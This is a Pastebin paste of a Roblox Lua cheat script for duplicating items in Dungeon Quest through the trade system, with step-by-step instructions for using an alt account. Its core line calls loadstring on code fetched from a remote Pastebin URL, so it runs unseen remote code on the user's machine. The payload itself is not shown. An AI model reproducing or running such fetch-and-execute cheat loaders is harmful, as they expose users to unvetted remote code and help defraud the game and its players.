Advertisement
SynapseTesting0001

Dungeon Quest DUPE script

Jun 12th, 2020
9,304
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.88 KB | None | 0 0
  1. --DUNGEON QUEST DUPE SCRIPT--
  2.  
  3. --INSTRUCTIONS--
  4.  
  5. --Step 1: Edit _G.ItemReceiver to The Name Of Ur Alt Which Would Get The Items Your Main Traded You--
  6.  
  7. --Step 2: Configure the Settings In _G.TypesToDupe To Choose What You Would Like To Dupe--
  8.  
  9. --Step 3: Join Dungeon Quest On Your Main Using The Website (Normal Roblox)--
  10.  
  11. --Step 4: Wait For The Trade On Your Alt, Then Press Accept--
  12.  
  13. --Step 5: Once Ur Main Is In The Dungeon, Finish the DUNGEON--
  14.  
  15. --SCRIPT--
  16.  
  17. _G.ItemReceiver = "SynapseTesting0002"
  18.  
  19. _G.TypesToDupe = {
  20. ["Weapons"] = true,
  21. ["Helmets"] = false,
  22. ["Chests"] = false,
  23. ["Spells"] = false
  24. }
  25.  
  26. loadstring(game:HttpGet('https://pastebin.com/raw/MEHPs1Xf', true))()
  27. --also disclaimer: this dupe has a success rate, there is a small chance that the duplicated items will be deleted (but not the originals)--
  28. --DO NOT DUPE ORBITAL OUTPOST ITEMS!--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement